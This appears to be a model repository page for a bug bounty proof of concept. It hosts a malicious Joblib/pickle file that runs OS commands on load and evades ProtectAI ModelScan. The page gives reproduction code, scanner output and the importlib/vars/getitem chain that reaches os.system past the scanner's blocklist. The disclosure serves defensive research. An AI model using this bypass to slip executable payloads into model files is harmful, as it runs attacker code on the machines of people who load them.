You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

Joblib ACE Scanner Bypass PoC

Huntr Bug Bounty Submission — Model File Formats (Joblib / ProtectAI ModelScan)

What is this?

bypass_v5.joblib is a 135-byte malicious Joblib/pickle file that:

  1. Executes arbitrary OS commands when loaded with joblib.load() or pickle.loads()
  2. Passes ProtectAI ModelScan v0.8.8 with zero detections (total_issues: 0, exit 0)

Reproduce

import pickle
result = pickle.loads(open("bypass_v5.joblib", "rb").read())
# Command executes immediately. os.system returns 0.

Scanner Bypass Proof

pip install modelscan
modelscan scan -p bypass_v5.joblib -r json
# {"summary": {"total_issues": 0, "CRITICAL": 0, ...}, "issues": []}
# Exit: 0

Technique

importlib.import_module('os') -> os_module
builtins.vars(os_module)      -> os.__dict__
operator.getitem(os.__dict__, 'system') -> os.system
os.system(cmd)                -> EXECUTE

None of these GLOBAL references appear on ModelScan's blocklist.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support